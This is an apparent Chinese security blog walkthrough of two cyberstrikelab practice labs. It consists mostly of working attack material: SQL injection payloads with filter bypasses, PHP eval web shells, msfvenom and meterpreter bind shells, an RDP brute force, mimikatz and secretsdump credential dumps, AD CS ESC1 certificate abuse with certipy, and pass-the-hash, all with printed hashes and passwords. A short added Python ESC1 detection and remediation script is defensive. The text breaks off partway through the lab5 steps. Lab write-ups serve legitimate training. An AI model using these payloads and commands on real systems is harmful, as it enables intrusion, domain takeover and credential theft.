泷羽Sec
2025-12-13
[Domain Penetration] cyberstrikelab-lab9
cyberstrikelab-lab9

First host: web server 172.5.33.6

SQL payload:

```
http://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5
```

The hash a66abb5684c45962d887564f08346e8d decrypts to admin123456.

The admin path was found in robots.txt. Log in with the administrator account; here the HTML templates turned out to contain PHP code. In template management, edit index.html:

```php
<?php @eval($_POST['a']);?>
```

The one-liner still could not be connected to, so a different kind of shell was tried. There seemed to be no other way in; of the dozen or so shell variants found online, only this one worked:

```php
<?php
// Shift every byte of $str forward by $offset (mod 256).
function simpleTransform($str, $offset = 1) {
    $transformed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $transformed .= chr((ord($str[$i]) + $offset) % 256);
    }
    return $transformed;
}

// Undo simpleTransform(): shift every byte back by $offset (mod 256).
function reverseTransform($str, $offset = 1) {
    $reversed = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $reversed .= chr((ord($str[$i]) - $offset + 256) % 256);
    }
    return $reversed;
}

// The request parameter is shifted forward and straight back again, so the
// original string is what ends up being evaluated.
$original    = $_REQUEST["a"];
$transformed = simpleTransform($original, 3);
$reversed    = reverseTransform($transformed, 3);
echo eval($reversed);
```

Connect with AntSword (蚁剑). Generate the payload:

```
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
```

Get the session:

```
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/bind_tcp; set RHOST 172.5.33.6; set LPORT 4444; exploit -j -z"
```

Escalate privileges and upload fscan:

```
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
```

Check the IP addresses and scan the internal network:

```
C:\phpstudy_pro\WWW>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter 以太网实例 1:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::3f:d815:5529:b836%11
   IPv4 Address. . . . . . . . . . . : 172.5.33.6
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.5.33.233

Ethernet adapter 以太网实例 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::c133:dd94:56a9:bdcc%2
   IPv4 Address. . . . . . . . . . . : 10.6.6.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.6.6.1

Tunnel adapter isatap.{730545FA-7DC0-4716-8AF2-678FFC6D1F1C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.{E6E2FD25-6949-4C86-A749-7F0F14616295}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.10/24
fscan.exe -h 10.6.6.10/24
fscan version: 1.8.1
start infoscan
(icmp) Target 10.6.6.10     is alive
(icmp) Target 10.6.6.55     is alive
(icmp) Target 10.6.6.88     is alive
[*] Icmp alive hosts len is: 3
10.6.6.55:88 open
10.6.6.10:3306 open
10.6.6.88:445 open
10.6.6.55:445 open
10.6.6.10:445 open
10.6.6.88:139 open
10.6.6.55:139 open
10.6.6.10:139 open
10.6.6.88:135 open
10.6.6.55:135 open
10.6.6.10:135 open
10.6.6.55:80 open
10.6.6.10:80 open
[*] alive ports len is: 13
start vulscan
[+] NetInfo:
[*]10.6.6.10
   [->]WIN-784BAKDI0AC
   [->]172.5.33.6
   [->]10.6.6.10
[+] NetInfo:
[*]10.6.6.55
   [->]DC
   [->]10.6.6.55
[+] NetInfo:
[*]10.6.6.88
   [->]cyberweb
   [->]10.6.6.88
[*] WebTitle:http://10.6.6.10       code:200 len:0      title:None
[*] 10.6.6.55  [+]DC __MSBROWSE__\DC            Windows Server 2016 Standard 14393
[*] 10.6.6.88  CYBERSTRIKELAB\CYBERWEB          Windows Server 2016 Standard 14393
[*] 10.6.6.88  (Windows Server 2016 Standard 14393)
[*] 10.6.6.55  (Windows Server 2016 Standard 14393)
[*] WebTitle:http://10.6.6.55       code:200 len:703    title:IIS Windows Server
[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect
已完成 13/13
[*] 扫描结束,耗时: 1m8.3819491s
```

From this, 10.6.6.55 is identified as the domain controller, and 10.6.6.88 is a domain member with hostname cyberweb in the domain CYBERSTRIKELAB. For 10.6.6.55 a finding was reported: poc-yaml-active-directory-certsrv-detect. This strongly suggests that Active Directory Certificate Services (AD CS) is running on that server, which becomes the key entry point for the later steps.

Set up routing and configure the proxy:

```
meterpreter > run post/multi/manage/autoroute

[*] Running module against WIN-784BAKDI0AC (172.5.33.6)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.6.6.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 172.5.33.0/255.255.255.0 from host's routing table.
meterpreter > bg
[*] Backgrounding session 2...
msf exploit(multi/handler) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
```

Configure the system proxy file proxychains4.conf:

```
┌──(root㉿kali)-[/data/windows_atk/domain_atk]
└─# tail -n 6 /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
```

Second host

A targeted fscan port scan found 3389 open and brute-forceable; the administrator password is qwe123!@#:

```
C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.88 -p 1-10000
fscan.exe -h 10.6.6.88 -p 1-10000
fscan version: 1.8.1
start infoscan
(icmp) Target 10.6.6.88     is alive
[*] Icmp alive hosts len is: 1
10.6.6.88:445 open
10.6.6.88:139 open
10.6.6.88:135 open
10.6.6.88:3389 open
10.6.6.88:5985 open
[*] alive ports len is: 5
start vulscan
[+] NetInfo:
[*]10.6.6.88
   [->]cyberweb
   [->]10.6.6.88
[*] 10.6.6.88  (Windows Server 2016 Standard 14393)
[*] WebTitle:http://10.6.6.88:5985  code:404 len:315    title:Not Found
[*] 10.6.6.88  CYBERSTRIKELAB\CYBERWEB          Windows Server 2016 Standard 14393
已完成 3/5 [-] (18/210) rdp 10.6.6.88:3389 administrator administrator1 remote error: tls: access denied
已完成 4/5 [-] (36/210) rdp 10.6.6.88:3389 administrator 123456789 remote error: tls: access denied
已完成 4/5 [-] (54/210) rdp 10.6.6.88:3389 administrator Aa12345 remote error: tls: access denied
[+] RDP:10.6.6.88:3389:administrator qwe123!@#
已完成 5/5
[*] 扫描结束,耗时: 4m8.7461024s
```

The second flag was found on the desktop.

Third host

This one looks like it requires a domain-controller-related vulnerability; EternalBlue failed.

```
use exploit/multi/handler
set rhost 10.6.6.88
run
```

Share the data directory (to make file transfer easier), then upload the bind shell and execute it:

```
proxychains rdesktop 10.6.6.88 -r disk:shell=/data
```

Privilege escalation:

```
meterpreter > getuid
Server username: CYBERWEB\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Dump domain hashes:

```
C:\Users\Administrator\Desktop>mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

User Name   : CYBERWEB$
Domain      : CYBERSTRIKELAB
NTLM        : 5e0d5d7bacf2087dfd44ea47812b5165

User Name   : CYBERWEB$
Domain      : CYBERSTRIKELAB
NTLM        : 331dcbb88d1a4847c97eab7c1c168ac8

User Name   : Administrator
Domain      : CYBERWEB
NTLM        : c377ba8a4dd52401bc404dbe49771bbc
```

In the file 3.bat an account and password were found: cslab / cs1ab@wwe.

Third host: ADCS

ADCS is a common path for lateral movement to the domain controller.

3.1 ADCS reconnaissance

The earlier fscan finding `[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect` indicates that AD Certificate Services may be present. Get a session again, run getsystem to obtain a SYSTEM-level cmd, and get the CA name (this requires SYSTEM) by running certutil. The name is cyberstrikelab-DC-CA.

With the CA name known, the next step is to determine the attack entry point and look for exploitable weaknesses, such as ESC1:

```
┌──(root㉿kali)-[/data/demo]
└─# proxychains certipy-ad find -u 'cslab@10.6.6.55' -password 'cs1ab@wwe' -dc-ip 10.6.6.55 -vulnerable -stdout
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:636  ...  OK
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'cyberstrikelab-DC-CA' via RRP
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.cyberstrikelab.com:445 <--socket error or timeout!
[-] Failed to connect to remote registry: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[-] Use -debug to print a stacktrace
[!] Failed to get CA configuration for 'cyberstrikelab-DC-CA' via RRP: 'NoneType' object has no attribute 'request'
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'cyberstrikelab-DC-CA'
[*] Checking web enrollment for CA 'cyberstrikelab-DC-CA' @ 'DC.cyberstrikelab.com'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.cyberstrikelab.com:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.cyberstrikelab.com:443  ...  OK
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : cyberstrikelab-DC-CA
    DNS Name                            : DC.cyberstrikelab.com
    Certificate Subject                 : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
    Certificate Serial Number           : 652A47597C7F03824B7815EBE474E40B
    Certificate Validity Start          : 2025-04-22 07:45:38+00:00
    Certificate Validity End            : 2030-04-22 07:55:38+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
    Active Policy                       : Unknown
    Disabled Extensions                 : Unknown
Certificate Templates
  0
    Template Name                       : DC
    Display Name                        : DC
    Certificate Authorities             : cyberstrikelab-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-22T07:58:11+00:00
    Template Last Modified              : 2025-04-22T07:58:11+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Users
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Domain Computers
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Authenticated Users
      Object Control Permissions
        Owner                           : CYBERSTRIKELAB.COM\Administrator
        Full Control Principals         : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        Write Owner Principals          : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        Write Dacl Principals           : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        Write Property Enroll           : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Domain Computers
                                          CYBERSTRIKELAB.COM\Enterprise Admins
    [+] User Enrollable Principals      : CYBERSTRIKELAB.COM\Authenticated Users
                                          CYBERSTRIKELAB.COM\Domain Computers
                                          CYBERSTRIKELAB.COM\Domain Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
```

| Parameter | Source / reason | Purpose |
|---|---|---|
| proxychains | the proxy configured earlier | routes the command's traffic through the pivot host (10.6.6.10) into the internal network |
| certipy-ad | tool choice | a tool dedicated to attacks against AD Certificate Services |
| find | subcommand | enumerates certificate templates and certificate authorities (CAs) |
| -u 'cslab@10.6.6.55' | obtained via mimikatz | uses the domain user cslab; the part after @ may be an IP or a domain name |
| -password 'cs1ab@wwe' | obtained via mimikatz / 3.bat | password of the cslab user |
| -dc-ip 10.6.6.55 | fscan result | IP address of the domain controller |
| -vulnerable | attack target | shows only templates with known weaknesses |
| -stdout | output option | prints the result to the terminal |

The output shows that ESC1 is present:

```
Template Name: DC
Enabled: True
Client Authentication: True
Enrollee Supplies Subject: True                      # the key point of ESC1
Enrollment Rights: CYBERSTRIKELAB.COM\Domain Users   # cslab can enroll
Vulnerabilities: ESC1
```

3.2 Exploiting ESC1

3.2.1 Create a (temporary) machine account

Use the domain user cslab to create a new machine account in the target domain. The result returns a temporary account tmpuser$ and its password:

```
proxychains certipy-ad -debug account create -u 'cslab@cyberstrikelab.com' -p 'cs1ab@wwe' -dc-ip 10.6.6.55 -user tmpuser -dns DC.cyberstrikelab.com
```

| Parameter | Source / reason | Purpose |
|---|---|---|
| account create | subcommand | creates a new machine account in the domain |
| -user tmpuser | chosen freely | creates a machine account named tmpuser$ |
| -dns DC.cyberstrikelab.com | from the fscan result | sets the machine account's DNS host name |

Why create one?

- Machine template restriction: some certificate templates (such as Machine) only allow machine accounts to enroll
- Stealth: avoids performing sensitive operations directly with the cslab account
- Permission requirements: machine accounts can request a wider range of certificate types

3.2.2 Request a certificate as the machine account

Use the newly created machine account tmpuser$ to request a machine certificate from the certificate authority (CA) on the target domain controller (10.6.6.55). It may need to be run several times; a single run does not always succeed:

```
proxychains certipy-ad req \
  -u 'tmpuser$@cyberstrikelab.com' \
  -p 'kQb8YIJOWcKq69w5' \
  -ca 'cyberstrikelab-DC-CA' \
  -target 10.6.6.55 \
  -template 'Machine' \
  -dc-ip 10.6.6.55
```

| Parameter | Source / reason | Purpose |
|---|---|---|
| req | subcommand | requests a certificate |
| -u 'tmpuser$@...' | created in the previous step | uses the newly created machine account |
| -p 'kQb8YIJOWcKq69w5' | output of the previous step | password of the machine account |
| -ca 'cyberstrikelab-DC-CA' | certipy find result | name of the certificate authority |
| -target 10.6.6.55 | fscan result | IP address of the CA server |
| -template 'Machine' | found during reconnaissance | uses the vulnerable template |

Authenticating to the domain controller (10.6.6.55) with the dc.pfx certificate failed with a Kerberos clock skew error: the attacker machine and the domain controller must not differ in time by more than 5 minutes.

```
┌──(root㉿kali)-[/data/demo]
└─# proxychains certipy-ad auth -pfx dc.pfx -dc-ip 10.6.6.55
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'DC.cyberstrikelab.com'
[*] Using principal: 'dc$@cyberstrikelab.com'
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:88  ...  OK
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
```

3.2.3 Fix the Kerberos clock skew

Query the domain controller's time:

```
proxychains net time -S 10.6.6.55
```

3.2.4 Authenticate with the certificate

Adjusting the time makes the command succeed:

```
┌──(root㉿kali)-[/data/demo]
└─# faketime '2025-12-11 22:57:01' proxychains certipy-ad -debug auth -pfx dc.pfx -dc-ip 10.6.6.55
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '10.6.6.55'
[+] DC IP: '10.6.6.55'
[+] DC Host: ''
[+] Target IP: '10.6.6.55'
[+] Remote Name: '10.6.6.55'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN DNS Host Name: 'DC.cyberstrikelab.com'
[*] Using principal: 'dc$@cyberstrikelab.com'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC cyberstrikelab.com (10.6.6.55)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:88  ...  OK
[*] Got TGT
[*] Saving credential cache to 'dc.ccache'
[+] Attempting to write data to 'dc.ccache'
[+] Data written to 'dc.ccache'
[*] Wrote credential cache to 'dc.ccache'
[*] Trying to retrieve NT hash for 'dc$'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:88  ...  OK
[*] Got hash for 'dc$@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa
```

| Parameter | Source / reason | Purpose |
|---|---|---|
| auth | subcommand | Kerberos authentication with a certificate |
| -pfx dc.pfx | generated in the previous step | certificate file containing the private key |
| -debug | debug option | shows detailed progress information |

The authentication process:

- Certificate submission: the dc.pfx certificate is presented to the domain controller (10.6.6.55)
- Identity verification: the certificate proves that the requester is DC$ (the domain controller's machine account)
- TGT acquisition: a Kerberos ticket-granting ticket (TGT) for DC$ is obtained
- Hash extraction: the NTLM hash of DC$ is extracted via the TGT

3.2.5 Obtain the NTLM hashes

Use the NT hash of the domain controller's machine account dc$ for Pass-the-Hash authentication and try to extract the credentials (NTLM hashes and so on) of all domain users from the domain controller.

```
┌──(root㉿kali)-[/data/demo]
└─# proxychains impacket-secretsdump cyberstrikelab.com/dc\$@10.6.6.55 -hashes aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.6.6.55:49669  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:7e5d2858c617c4ccf32b28241dc5b8b2:::
tmpuser$:1105:aad3b435b51404eeaad3b435b51404ee:6fe8e4da8776622663eed7aba05de2f7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8583c13a9eca67e085ff0b68af74316bef0ebd3fb197bb235b76cbb72358f2ef
Administrator:aes128-cts-hmac-sha1-96:6012285d474e3b60086965219ac7e31c
Administrator:des-cbc-md5:208fc8f42fae3132
krbtgt:aes256-cts-hmac-sha1-96:0b820697b640266ced6843c4041131c1e3750000e00d47c0c597a82547927337
krbtgt:aes128-cts-hmac-sha1-96:c8f683e4cf2033fd75416667670e13bb
krbtgt:des-cbc-md5:23dc674a76bf7adc
cyberstrikelab.com\cslab:aes256-cts-hmac-sha1-96:34439b0bf9f6e1bf57d4d859215ed387a9c75e944ac053ddd1bc2f1e5b162048
cyberstrikelab.com\cslab:aes128-cts-hmac-sha1-96:84a132b5db39e2e652c08b8148fecb00
cyberstrikelab.com\cslab:des-cbc-md5:46f457ef2aad0e08
DC$:aes256-cts-hmac-sha1-96:2292c30804bdf9a61d170f48d38b30d3f843bb8310677ac7116e925f663edcbd
DC$:aes128-cts-hmac-sha1-96:b583afdc96a04ec0ceda8dffdfa2e883
DC$:des-cbc-md5:a75801e31943a2dc
CYBERWEB$:aes256-cts-hmac-sha1-96:c0418d75b0ef82607eadcd0f4793441aa17fc71df788e83a531ae87ce2cc92d9
CYBERWEB$:aes128-cts-hmac-sha1-96:3c602f53a3722c0a602a5adf2114354a
CYBERWEB$:des-cbc-md5:6d5dd3261f38c862
tmpuser$:aes256-cts-hmac-sha1-96:952c1a920206e3a5852ea56dfdde77acb8270bf12628c29a7f702a9cdc8fb081
tmpuser$:aes128-cts-hmac-sha1-96:1174b1ae9d7f4b04fd5eef81bcbd2144
tmpuser$:des-cbc-md5:795d80ec58cdd5a8
[*] Cleaning up...
```

| Parameter | Source / reason | Purpose |
|---|---|---|
| impacket-secretsdump | tool choice | remotely extracts password hashes |
| cyberstrikelab.com/dc\$@10.6.6.55 | target | connects to the domain controller as the dc$ account |
| -hashes ... | obtained in the previous step | supplies the LM and NTLM hashes of dc$ |
| the \ in dc\$ | shell escaping | stops the shell from expanding $ as a variable |

3.2.6 PTH

Pass the hash to take over the domain controller and read the final flag in the root directory:

```
┌──(root㉿kali)-[/data/demo]
└─# proxychains impacket-psexec -hashes :28cfbc91020438f2a064a63fff9871fa cyberstrikelab.com/administrator@10.6.6.55
```
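Certipy reports ESC1 when the template attributes above line up in a particular way, and the same check is what a defender runs when auditing templates. As an added example (not part of the original post and not Certipy's own code), the Python below parses a certipy-style template listing, re-derives the ESC1 verdict together with a remediation list, and re-runs the check on a hardened copy of the template. The listing is a constructed sample filled with the DC template values shown above; the parser, the LOW_PRIVILEGED set and the field names are assumptions of this example.

```python
import re

# Groups that every domain member belongs to. If one of these may enroll in a
# template that lets the enrollee pick the subject, ESC1 applies (assumed list).
LOW_PRIVILEGED = {"Domain Users", "Authenticated Users", "Domain Computers",
                  "Everyone", "Users"}

# Constructed sample in the layout of certipy's text output, filled with the
# values of the DC template from the walkthrough above.
SAMPLE_TEMPLATE_TEXT = """\
    Template Name                       : DC
    Display Name                        : DC
    Certificate Authorities             : cyberstrikelab-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\\Domain Users
                                          CYBERSTRIKELAB.COM\\Domain Admins
                                          CYBERSTRIKELAB.COM\\Authenticated Users
      Object Control Permissions
        Owner                           : CYBERSTRIKELAB.COM\\Administrator
"""

# The same template after remediation: the CA builds the subject from AD and a
# certificate manager must approve each request.
HARDENED_TEMPLATE_TEXT = re.sub(r"(Requires Manager Approval\s+: )False", r"\1True",
                                re.sub(r"(Enrollee Supplies Subject\s+: )True", r"\1False",
                                       SAMPLE_TEMPLATE_TEXT))


def parse_template(text: str) -> dict:
    """Parse 'Key : Value' lines into {key: [values]}. A line without ' : ' that is
    indented deeper than the last key continues that key's value list (multi-
    principal fields); any other such line is a section header."""
    fields: dict = {}
    last_key, last_indent = None, -1
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip())
        if " : " in raw:
            key, value = (p.strip() for p in raw.split(" : ", 1))
            fields[key] = [value] if value else []
            last_key, last_indent = key, indent
        elif last_key is not None and indent > last_indent:
            fields[last_key].append(raw.strip())
        else:
            last_key, last_indent = None, indent
    return fields


def assess_esc1(t: dict) -> dict:
    """Apply the ESC1 conditions: enabled, an authentication EKU, enrollee-supplied
    subject, no manager approval, no required signatures, and enrollment rights
    held by a low-privileged group."""
    def is_true(key: str) -> bool:
        return t.get(key, ["False"])[0] == "True"

    ekus = set(t.get("Extended Key Usage", []))
    auth_eku = is_true("Client Authentication") or is_true("Any Purpose") or not ekus
    low_priv = [p for p in t.get("Enrollment Rights", [])
                if p.split("\\")[-1] in LOW_PRIVILEGED]
    try:
        signatures = int(t.get("Authorized Signatures Required", ["0"])[0])
    except ValueError:
        signatures = 0

    conditions = {
        "enabled": is_true("Enabled"),
        "authentication_eku": auth_eku,
        "enrollee_supplies_subject": is_true("Enrollee Supplies Subject"),
        "no_manager_approval": not is_true("Requires Manager Approval"),
        "no_authorized_signatures": signatures == 0,
        "low_privileged_enrollment": bool(low_priv),
    }
    vulnerable = all(conditions.values())
    remediation = []
    if vulnerable:
        remediation.append("Clear ENROLLEE_SUPPLIES_SUBJECT so the CA builds the subject from AD.")
        remediation.append("Require CA certificate manager approval for this template.")
        remediation.append("Remove Enroll rights for: " + ", ".join(low_priv))
    return {"template": t.get("Template Name", ["?"])[0], "esc1": vulnerable,
            "conditions": conditions, "low_privileged_enrollers": low_priv,
            "remediation": remediation}


if __name__ == "__main__":
    for label, text in (("as found", SAMPLE_TEMPLATE_TEXT), ("hardened", HARDENED_TEMPLATE_TEXT)):
        verdict = assess_esc1(parse_template(text))
        print(label, verdict["template"], "ESC1:", verdict["esc1"])
        for step in verdict["remediation"]:
            print("   -", step)
```

The three remediation lines map one-to-one onto the three conditions an administrator controls from the template's properties; fixing any single one of them already breaks the ESC1 chain, which the hardened copy demonstrates.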
2025-12-13
[Domain Penetration] cyberstrikelab-lab5
cyberstrikelab-lab5

Web penetration: BEESCMS

1. The admin backend has a captcha reuse flaw, so the backend account and password can be brute-forced.

2. The backend has a SQL injection flaw:

```
admin' order by 5--+

# "and" is filtered
admin' and updatexml(1,concat(0x7e,select database(),0x7e),1)--+

# remove the leading space
admin'and updatexml(1,concat(0x7e,select database(),0x7e),1)--+

# the error message is shown below; the database name is beescms
操作数据库失败XPATH syntax error: '~,beescms~'<br>sql:select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='admin'and updatexml(1,concat(0x7e, database(),0x7e),1)-- ' limit 0,1

# other double-write bypasses
union  => uni union on
select => seselectlect
from   => fr from om
where  => wh where ere

# column 1: admin_name
admin'a and nd updatexml(1,concat(0x7e,(seselectlect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e),1)#

# column 2: admin_password
admin'a and nd updatexml(1,concat(0x7e,(seselectlect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 2,1),0x7e),1)#

# value 1: admin
admin'a and nd updatexml(1,concat(0x7e,(seselectlect admin_name fr from om beescms.bees_admin limit 0,1),0x7e),1)#

# value 2: 7e60bc642fefc11b43792e8745df6c1  // decrypted at cmd5.com: cyber
admin'a and nd updatexml(1,concat(0x7e,(seselectlect admin_password fr from om beescms.bees_admin limit 0,1),0x7e),1)#
```

The password is cyber. Log in; the version is 4.0. Prepare an image shell, shell.jpg, intercept the upload and rename it to shell.php:

```php
<?php @eval($_POST['shell']); ?>
```

In the uploaded-image management page, view the page source and find the HTML tag of the newly uploaded image; it reveals the path of the PHP file. Then connect with AntSword:

```
http://192.168.10.10:6582/upload/img/202512101423498303.php
```

Internal network penetration

```
msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z"
upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
upload /data/windows_atk/mimikatz/x64/x64/mimikatz.exe
```

Scan the internal network with fscan; on 20.20, port 8080 hosts a JBoss content management system:

```
C:\phpstudy_pro\WWW\upload\img>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter 以太网实例 0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::d4eb:d150:7852:d93f%8
   IPv4 Address. . . . . . . . . . . : 192.168.10.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.233

Ethernet adapter 以太网实例 0 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::f90f:239c:ae8a:42db%15
   IPv4 Address. . . . . . . . . . . : 192.168.20.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1

